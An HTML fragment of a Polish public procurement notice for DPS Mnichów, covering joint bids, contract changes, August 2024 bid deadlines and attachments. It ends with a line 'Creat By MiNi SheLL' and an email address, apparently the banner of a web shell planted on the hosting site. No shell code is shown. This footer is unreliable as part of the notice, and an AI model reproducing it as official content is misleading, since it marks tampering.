class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców i/lub polegania na zasobach innych podmiotów<br/>oświadczenia potwierdzające brak podstaw wykluczenia oraz spełnianie konkretnego warunku udziału w postępowaniu<br/>składa:<br/>a) każdy z Wykonawców - art. 125 ust. 4 Pzp oraz<br/>b) każdy podmiot udostępniający - art. 125 ust. 5 Pzp.<br/>2. Zamawiający nie weryfikuje podstaw wykluczenia w odniesieniu do podwykonawcy.<br/>3. Oferty wykonawców, którzy nie złożą lub nie uzupełnią oświadczenia o którym mowa w pkt 1, podlegają odrzuceniu na<br/>podstawie art. 226 ust. 1 pkt 2 lit. „c” Pzp.<br/>4. Do oferty każdy Wykonawca nie musi dołączyć przedmiotowych środków dowodowych, zgodnie z częścią VIII pkt 2. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy,<br/>określone zostały w załączniku nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-21 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">DPS Mnichów: Portal ezamówienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-21 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Załączniki stanowiące integralną część SWZ i wymagań związanych z realizacją przedmiotu zamówienia.<br/>Załącznik nr 1 - Formularz ofertowy wraz z załącznikami<br/>Załącznik nr 2 - Oświadczenie składane na podstawie art. 125 ust.1 ustawy Pzp dotyczące spełniania warunków udziału w postępowaniu oraz wykluczenia z postępowania,<br/>Załącznik nr 3 - Projekt umowy,<br/>Załącznik nr 4 – Oświadczenie dot. udostępnienia zasobów (jeżeli dotyczy),<br/>Załącznik nr 5 - Obowiązek informacyjny - zamówienia publiczne – postępowanie<br/>Załącznik nr 6 - Oświadczenie ws przeciwdziałania wspieraniu agresji na Ukrainę

Creat By MiNi SheLL
Email: jattceo@gmail.com